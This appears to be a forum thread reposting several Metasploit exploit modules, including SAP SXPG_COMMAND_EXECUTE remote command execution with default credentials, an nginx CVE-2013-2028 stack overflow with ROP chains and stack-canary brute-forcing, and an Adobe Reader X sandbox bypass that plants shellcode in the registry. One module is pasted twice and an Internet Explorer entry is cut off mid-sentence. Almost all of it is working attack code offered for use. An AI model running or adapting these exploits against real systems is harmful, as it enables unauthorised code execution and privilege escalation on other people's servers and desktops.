# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
# Dmitry Evdokimov.
#
# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
# who have Beta tested the modules and provided excellent feedback. Some people
# just seem to enjoy hacking SAP :)
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
 
  Rank = GreatRanking
 
  include Msf::Exploit::CmdStagerVBS
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
 
  def initialize
    super(
      'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution',
      'Description' => %q{
          This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP
        SOAP RFC Service, to execute remote commands. This module needs SAP credentials with
        privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested
        successfully on Windows 2008 64 bits and Linux 64 bits platforms.
      },
      'References' =>
        [
          [ 'URL', 'http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection' ],
          [ 'URL', 'https://service.sap.com/sap/support/notes/1764994' ],
          [ 'URL', 'https://service.sap.com/sap/support/notes/1341333' ]
        ],
      'DisclosureDate' => 'May 8 2012',
      'Platform'       => ['win', 'unix'],
      'Targets' => [
        [ 'Linux',
          {
            'Arch'     => ARCH_CMD,
            'Platform' => 'unix'
            #'Payload'  =>
              #{
                #'DisableNops' => true,
                #'Space'       => 232,
                #'Compat'      =>
                  #{
                    #'PayloadType' => 'cmd',
                    #'RequiredCmd' => 'perl ruby',
                  #}
              #}
          }
        ],
        [ 'Windows x64',
          {
            'Arch' => ARCH_X86_64,
            'Platform' => 'win'
          }
        ]
      ],
      'DefaultTarget' => 0,
      'Privileged' => false,
      'Author' =>
        [
          'nmonkee'
        ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('CLIENT', [true, 'SAP Client', '001']),
        OptString.new('USERNAME', [true, 'Username', 'SAP*']),
        OptString.new('PASSWORD', [true, 'Password', '06071992'])
      ], self.class)
    register_advanced_options(
      [
        OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
      ], self.class)
  end
 
  def send_soap_request(data)
    res = send_request_cgi({
      'uri' => '/sap/bc/soap/rfc',
      'method' => 'POST',
      'data' => data,
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
      'ctype' => 'text/xml; charset=UTF-8',
      'headers' => {
        'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
      },
      'vars_get' => {
        'sap-client' => datastore['CLIENT'],
        'sap-language' => 'EN'
      }
    })
    return res
  end
 
  def build_soap_request(command, sap_command, sap_os)
    data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\r\n"
    data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n"
    data << "<env:Body>\r\n"
    data << "<n1:SXPG_COMMAND_EXECUTE xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n"
    data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>\r\n"
    data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>\r\n"
    data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>\r\n"
    data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>\r\n"
    data << "</n1:SXPG_COMMAND_EXECUTE>\r\n"
    data << "</env:Body>\r\n"
    data << "</env:Envelope>"
 
    return data
  end
 
  def check
    data = rand_text_alphanumeric(4 + rand(4))
    res = send_soap_request(data)
    if res and res.code == 500 and res.body =~ /faultstring/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    if target.name =~ /Windows/
      linemax = datastore['PAYLOAD_SPLIT']
      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
      print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request")
      execute_cmdstager({ :delay => 0.35, :linemax => linemax })
    elsif target.name =~ /Linux/
      file = rand_text_alphanumeric(5)
      stage_one = create_unix_payload(1,file)
      print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
      res = send_soap_request(stage_one)
      if res and res.code == 200 and res.body =~ /External program terminated/
        print_good("#{rhost}:#{rport} - Payload dump was successful")
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
      end
      stage_two = create_unix_payload(2,file)
      print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
      send_soap_request(stage_two)
    end
  end
 
  def create_unix_payload(stage, file)
    command = ""
    if target.name =~ /Linux/
      if stage == 1
        my_payload = payload.encoded.gsub(" ","\t")
        my_payload.gsub!("&","&")
        my_payload.gsub!("<","<")
        command = "-o /tmp/" + file + " -n pwnie" + "\n!"
        command << my_payload
        command << "\n"
      elsif stage == 2
        command = "-ic /tmp/" + file
      end
 
    end
 
    return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
  end
 
  def execute_command(cmd, opts)
    command = cmd.gsub(/&/, "&")
    command.gsub!(/%TEMP%\\/, "")
    data = build_soap_request("&#{command}", "LIST_DB2DUMP", "Windows NT")
    begin
      res = send_soap_request(data)
      if res and res.code == 200
        return
      else
        if res and res.body =~ /faultstring/
          error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
          0.upto(error.length-1) do |i|
            vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
          end
        end
        print_status("#{res.code}\n#{res.body}")
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
    end
  end
end
 
# 739BDF689D046CA5   1337day.com [2013-05-21]   E6BB218E8E039918 #

Добавлено в [time]1369130150[/time]
Microsoft Internet Explorer CGenericElement Object Use-After-Free

##
#
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "8.0",
    :ua_maxver  => "8.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :rank       => GoodRanking
  })
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Microsoft Internet Explorer. A
        use-after-free condition occurs when a CGenericElement object is freed, but a
        reference is kept on the Document and used again during rendering, an invalid
        memory that's controllable is used, and allows arbitrary code execution under the
        context of the user.
 
          Please note: This vulnerability has been exploited in the wild on 2013 May, in
        the compromi

 

[DarckSol]

Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow //**// CVE-2013-2028, OSVDB-93037 //**//

This Metasploit module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible

.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  include Exploit::Remote::Tcp

  def initialize(info = {})

    super(update_info(info,
      'Name'           => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.
        The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by
        supplying an overly long hex value as chunked block size. This value is later used
        when determining the number of bytes to read into a stack buffer, thus the overflow
        becomes possible.
      },
      'Author'         =>
        [
          'Greg MacManus',    # original discovery
          'hal',              # Metasploit module
          'saelo'             # Metasploit module
        ],
      'DisclosureDate' => 'May 07 2013',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-2028'],
          ['OSVDB', '93037'],
          ['URL', 'http://nginx.org/en/security_advisories.html'],
          ['URL', 'http://packetstormsecurity.com/files/121560/Nginx-1.3.9-1.4.0-Stack-Buffer-Overflow.html']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'BadChars' => "\x0d\x0a",
        },
      'Arch' => ARCH_CMD,
      'Platform' => 'unix',
      'Targets'        =>
        [
          [ 'Ubuntu 13.04 32bit - nginx 1.4.0', {
            'CanaryOffset' => 5050,
            'Offset' => 12,
            'Writable' => 0x080c7330, # .data from nginx
            :dereference_got_callback => :dereference_got_ubuntu_1304,
            :store_callback => :store_ubuntu_1304,
          }],
          [ 'Debian Squeeze 32bit - nginx 1.4.0', {
            'Offset' => 5130,
            'Writable' => 0x080b4360, # .data from nginx
            :dereference_got_callback => :dereference_got_debian_squeeze,
            :store_callback => :store_debian_squeeze
          } ],
        ],

      'DefaultTarget' => 0
  ))

  register_options([
      OptPort.new('RPORT', [true, "The remote HTTP server port", 80])
    ], self.class)

  register_advanced_options(
    [
      OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff ]),
    ], self.class)

  end

  def peer
    "#{rhost}:#{rport}"
  end

  def check
    begin
      res = send_request_fixed(nil)

      if res =~ /^Server: nginx\/(1\.3\.(9|10|11|12|13|14|15|16)|1\.4\.0)/m
        return Exploit::CheckCode::Appears
      elsif res =~ /^Server: nginx/m
        return Exploit::CheckCode::Detected
      end

    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_error("#{peer} - Connection failed")
    end

    return Exploit::CheckCode::Unknown
  end

  #
  # Generate a random chunk size that will always result
  # in a negative 64bit number when being parsed
  #
  def random_chunk_size(bytes=16)
    return bytes.times.map{ (rand(0x8) + 0x8).to_s(16) }.join
  end

  def send_request_fixed(data)

    connect

    request =   "GET / HTTP/1.1\r\n"
    request <<  "Host: #{Rex::Text.rand_text_alpha(16)}\r\n"
    request <<  "Transfer-Encoding: Chunked\r\n"
    request <<  "\r\n"
    request <<  "#{data}"

    sock.put(request)

    res = nil

    begin
      res = sock.get_once(-1, 0.5)
    rescue EOFError => e
      # Ignore
    end

    disconnect
    return res
  end

  def store_ubuntu_1304(address, value)
    chain = [
      0x0804c415, # pop ecx; add al, 29h; ret
      address, # address
      0x080b9a38, # pop eax; ret
      value.unpack('V').first, # value
      0x080a9dce, # mov [ecx], eax; mov [ecx+4], edx; mov eax, 0; ret
    ]
    return chain.pack('V*')
  end

  def dereference_got_ubuntu_1304
    chain = [
      0x08094129,         # pop esi; ret
      0x080c5090,         # GOT for localtime_r
      0x0804c415,         # pop ecx; add al, 29h; ret
      0x001a4b00,         # Offset to system
      0x080c360a,         # add ecx, [esi]; adc al, 41h; ret
      0x08076f63,         # push ecx; add al, 39h; ret
      0x41414141,         # Garbage return address
      target['Writable'], # ptr to .data where contents have been stored
    ]
    return chain.pack('V*')
  end

  def store_debian_squeeze(address, value)
    chain = [
      0x08050d93,              # pop edx; add al 0x83; ret
      value.unpack('V').first, # value
      0x08067330,              # pop eax; ret
      address,                 # address
      0x08070e94,              # mov [eax] edx; mov eax 0x0; pop ebp; ret
      0x41414141,              # ebp
    ]

    return chain.pack('V*')
  end

  def dereference_got_debian_squeeze
    chain = [
      0x0804ab34,        # pop edi; pop ebp; ret
      0x080B4128 -
      0x5d5b14c4,        # 0x080B4128 => GOT for localtime_r; 0x5d5b14c4 => Adjustment
      0x41414141,      # padding (ebp)
      0x08093c75,        # mov ebx, edi; dec ecx; ret
      0x08067330,        # pop eax # ret
      0xfffb0c80,        # offset
      0x08078a46,        # add eax, [ebx+0x5d5b14c4] # ret
      0x0804a3af,         # call eax # system
      target['Writable'] # ptr to .data where contents have been stored
    ]
    return chain.pack("V*")
  end

  def store(buf, address, value)
    rop = target['Rop']
    chain = rop['store']['chain']
    chain[rop['store']['address_offset']] = address
    chain[rop['store']['value_offset']] = value.unpack('V').first
    buf << chain.pack('V*')
  end

  def dereference_got

    unless self.respond_to?(target[:store_callback]) and self.respond_to?(target[:dereference_got_callback])
      fail_with(Exploit::Failure::NoTarget, "Invalid target specified: no callback functions defined")
    end

    buf = ""
    command = payload.encoded
    i = 0
    while i < command.length
      buf << self.send(target[:store_callback], target['Writable'] + i, command[i, 4].ljust(4, ";"))
      i = i + 4
    end

    buf << self.send(target[:dereference_got_callback])

    return buf
  end

  def exploit
    data = random_chunk_size(1024)

    if target['CanaryOffset'].nil?
      data << Rex::Text.rand_text_alpha(target['Offset'] - data.size)
    else

      if not datastore['CANARY'] == 0xffffffff
        print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY'])
        canary = datastore['CANARY']
      else
        print_status("#{peer} - Searching for stack canary")
        canary = find_canary

        if canary.nil? || canary == 0x00000000
          fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to find stack canary")
        else
          print_good("#{peer} - Canary found: 0x%08x\n" % canary)
        end
      end

      data <<  Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size)
      data <<  [canary].pack('V')
      data << Rex::Text.rand_text_hex(target['Offset'])

    end

    data << dereference_got

    begin
      send_request_fixed(data)
    rescue Errno::ECONNRESET => e
      # Ignore
    end
    handler
  end

  def find_canary
    # First byte of the canary is already known
    canary = "\x00"

    print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00)

    # We are going to bruteforce the next 3 bytes one at a time
    3.times do |c|
      print_status("#{peer} - Bruteforcing byte #{c + 1}")

      0.upto(255) do |i|
        data =   random_chunk_size(1024)
        data <<  Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size)
        data <<  canary
        data << i.chr

        unless send_request_fixed(data).nil?
          print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i)
          canary << i.chr
          break
        end
      end
    end

    if canary == "\x00"
      return nil
    else
      return canary.unpack('V').first
    end
  end
end

Добавлено в [time]1369291911[/time]
AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass
/**/ CVE-2013-2730, OSVDB-93355 /**/

This Metasploit module exploits a vulnerability on Adobe Reader X Sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write register values which can be used to trigger a buffer overflow on the AdobeCollabSync component, allowing to achieve Medium Integrity Level privileges from a Low Integrity AcroRd32.exe process. This Metasploit module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit3 < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Registry

  def initialize(info={})
    super(update_info(info, {
      'Name'          => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',
      'Description'    => %q{
          This module exploits a vulnerability on Adobe Reader X Sandbox. The
        vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe
        process to write register values which can be used to trigger a buffer overflow on
        the AdobeCollabSync component, allowing to achieve Medium Integrity Level
        privileges from a Low Integrity AcroRd32.exe process. This module has been tested
        successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Felipe Andres Manzano', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'CVE', '2013-2730' ],
          [ 'OSVDB', '93355' ],
          [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]
        ],
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'SessionTypes'  => 'meterpreter',
      'Payload'        =>
        {
          'Space'       => 12288,
          'DisableNops' => true
        },
      'Targets'       =>
        [
          [ 'Adobe Reader X 10.1.4 / Windows 7 SP1',
            {
              'AdobeCollabSyncTrigger' => 0x18fa0,
              'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF"
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate'=> 'May 14 2013'
    }))

  end

  def on_new_session
    print_status("Deleting Malicious Registry Keys...")
    if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
      print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself")
    end
    if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
      print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself")
    end
    print_status("Cleanup finished")
  end

  # Test the process integrity level by trying to create a directory on the TEMP folder
  # Access should be granted with Medium Integrity Level
  # Access should be denied with Low Integrity Level
  # Usint this solution atm because I'm experiencing problems with railgun when trying
  # use GetTokenInformation
  def low_integrity_level?
    tmp_dir = expand_path("%TEMP%")
    cd(tmp_dir)
    new_dir = "#{rand_text_alpha(5)}"
    begin
      session.shell_command_token("mkdir #{new_dir}")
    rescue
      return true
    end

    if directory?(new_dir)
      session.shell_command_token("rmdir #{new_dir}")
      return false
    else
      return true
    end
  end

  def check_trigger
    signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)
    if signature == target['AdobeCollabSyncTriggerSignature']
      return true
    end
    return false
  end

  def collect_addresses
    # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe
    @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']
    vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}")

    # find kernel32.dll
    kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll")
    @addresses['kernel32.dll'] = kernel32["return"]
    if @addresses['kernel32.dll'] == 0
      fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll")
    end
    vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}")

    # find kernel32.dll methods
    virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc")
    @addresses['VirtualAlloc'] = virtual_alloc["return"]
    if @addresses['VirtualAlloc'] == 0
      fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc")
    end
    vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}")

    reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA")
    @addresses['RegGetValueA'] = reg_get_value["return"]
    if @addresses['RegGetValueA'] == 0
      fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA")
    end
    vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}")

    # find ntdll.dll
    ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll")
    @addresses['ntdll.dll'] = ntdll["return"]
    if @addresses['ntdll.dll'] == 0
      fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll")
    end
    vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}")
  end

  # Search a gadget identified by pattern on the process memory
  def search_gadget(base, offset_start, offset_end, pattern)
    mem  = base + offset_start
    length = offset_end - offset_start
    mem_contents = session.railgun.memread(mem, length)
    return mem_contents.index(pattern)
  end

  # Search for gadgets on ntdll.dll
  def search_gadgets
    ntdll_text_base = 0x10000
    search_length =  0xd6000

    @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3")
    if @gadgets['mov [edi], ecx # ret'].nil?
      fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'")
    end
    @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']
    @gadgets['mov [edi], ecx # ret'] += ntdll_text_base
    vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}")

    @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2
    vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}")

    @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3")
    if @gadgets['pop edi # ret'].nil?
      fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'")
    end
    @gadgets['pop edi # ret'] += @addresses['ntdll.dll']
    @gadgets['pop edi # ret'] += ntdll_text_base
    vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}")

    @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3")
    if @gadgets['pop ecx # ret'].nil?
      fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'")
    end
    @gadgets['pop ecx # ret'] += @addresses['ntdll.dll']
    @gadgets['pop ecx # ret'] += ntdll_text_base
    vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
  end

  def store(buf, data, address)
    i = 0
    while (i < data.length)
      buf << [@gadgets['pop edi # ret']].pack("V")
      buf << [address + i].pack("V") # edi
      buf << [@gadgets['pop ecx # ret']].pack("V")
      buf << data[i, 4].ljust(4,"\x00") # ecx
      buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
      i = i + 4
    end
    return i
  end

  def create_rop_chain
    mem = 0x0c0c0c0c

    buf =  [0x58000000 + 1].pack("V")
    buf << [0x58000000 + 2].pack("V")
    buf << [0].pack("V")
    buf << [0x58000000 + 4].pack("V")

    buf << [0x58000000 + 5].pack("V")
    buf << [0x58000000 + 6].pack("V")
    buf << [0x58000000 + 7].pack("V")
    buf << [@gadgets['ret']].pack("V")
    buf << rand_text(8)

    # Allocate Memory To store the shellcode and the necessary data to read the
    # shellcode stored in the registry
    buf << [@addresses['VirtualAlloc']].pack("V")
    buf << [@gadgets['ret']].pack("V")
    buf << [mem].pack("V")        # lpAddress
    buf << [0x00010000].pack("V") # SIZE_T dwSize
    buf << [0x00003000].pack("V") # DWORD flAllocationType
    buf << [0x00000040].pack("V") # flProtect

    # Put in the allocated memory the necessary data in order to read the
    # shellcode stored in the registry
    # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
    reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
    reg_key_length = store(buf, reg_key, mem)
    # 2) The reg entry: shellcode
    value_key = "shellcode\x00"
    store(buf, value_key, mem + reg_key_length)
    # 3) The output buffer size: 0x3000
    size_buffer = 0x3000
    buf << [@gadgets['pop edi # ret']].pack("V")
    buf << [mem + 0x50].pack("V") # edi
    buf << [@gadgets['pop ecx # ret']].pack("V")
    buf << [size_buffer].pack("V")     # ecx
    buf << [@gadgets['mov [edi], ecx # ret']].pack("V")

    # Copy the shellcode from the the registry to the
    # memory allocated with executable permissions and
    # ret into there
    buf << [@addresses['RegGetValueA']].pack("V")
    buf << [mem + 0x1000].pack("V") # ret to shellcode
    buf << [0x80000001].pack("V")   # hkey => HKEY_CURRENT_USER
    buf << [mem].pack("V")          # lpSubKey
    buf << [mem + 0x3c].pack("V")   # lpValue
    buf << [0x0000FFFF].pack("V")   # dwFlags => RRF_RT_ANY
    buf << [0].pack("V")            # pdwType
    buf << [mem + 0x1000].pack("V") # pvData
    buf << [mem + 0x50].pack("V")   # pcbData
  end

  # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry
  def store_data_registry(buf)
    vprint_status("Creating the Registry Key to store the shellcode...")

    if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
      vprint_good("Registry Key created")
    else
      fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode")
    end

    vprint_status("Storing the shellcode in the Registry...")

    if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY")
      vprint_good("Shellcode stored")
    else
      fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry")
    end

    # Create the Malicious registry entry in order to exploit....
    vprint_status("Creating the Registry Key to trigger the Overflow...")
    if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
      vprint_good("Registry Key created")
    else
      fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow")
    end

    vprint_status("Storing the trigger in the Registry...")
    if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY")
      vprint_good("Trigger stored")
    else
      fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry")
    end
  end

  def trigger_overflow
    vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...")
    # Create a thread in order to execute the necessary code to launch AdobeCollabSync
    ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil)
    if ret['return'] < 1
      print_error("Unable to CreateThread")
      return
    end
    hthread = ret['return']

    vprint_status("Resuming the Thread...")
    # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!
    ret = client.railgun.kernel32.ResumeThread(hthread)
    if ret['return'] < 1
      fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread")
    end
  end

  def check
    @addresses = {}
    acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
    @addresses['AcroRd32.exe'] = acrord32["return"]
    if @addresses['AcroRd32.exe'] == 0
      return Msf::Exploit::CheckCode::Unknown
    elsif check_trigger
      return Msf::Exploit::CheckCode::Vulnerable
    else
      return Msf::Exploit::CheckCode::Detected
    end
  end

  def exploit
    @addresses = {}
    @gadgets = {}

    print_status("Verifying we're in the correct target process...")
    acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
    @addresses['AcroRd32.exe'] = acrord32["return"]
    if @addresses['AcroRd32.exe'] == 0
      fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found")
    end
    vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}")

    print_status("Checking the AcroRd32.exe image...")
    if not check_trigger
      fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target")
    end

    print_status("Checking the Process Integrity Level...")
    if not low_integrity_level?
      fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level")
    end

    print_status("Collecting necessary addresses for exploit...")
    collect_addresses

    print_status("Searching the gadgets needed to build the ROP chain...")
    search_gadgets
    print_good("Gadgets collected...")

    print_status("Building the ROP chain...")
    buf = create_rop_chain
    print_good("ROP chain ready...")

    print_status("Storing the shellcode and the trigger in the Registry...")
    store_data_registry(buf)

    print_status("Executing AdobeCollabSync.exe...")
    trigger_overflow
  end
end

 

[DarckSol]

AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
require 'msf/core/post/common'
require 'msf/core/post/file'
 
class Metasploit3 < Msf::Exploit::Local
  Rank = GreatRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Registry
 
  def initialize(info={})
    super(update_info(info, {
      'Name'          => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',
      'Description'    => %q{
          This module exploits a vulnerability on Adobe Reader X Sandbox. The
        vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe
        process to write register values which can be used to trigger a buffer overflow on
        the AdobeCollabSync component, allowing to achieve Medium Integrity Level
        privileges from a Low Integrity AcroRd32.exe process. This module has been tested
        successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Felipe Andres Manzano', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'CVE', '2013-2730' ],
          [ 'OSVDB', '93355' ],
          [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]
        ],
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'SessionTypes'  => 'meterpreter',
      'Payload'        =>
        {
          'Space'       => 12288,
          'DisableNops' => true
        },
      'Targets'       =>
        [
          [ 'Adobe Reader X 10.1.4 / Windows 7 SP1',
            {
              'AdobeCollabSyncTrigger' => 0x18fa0,
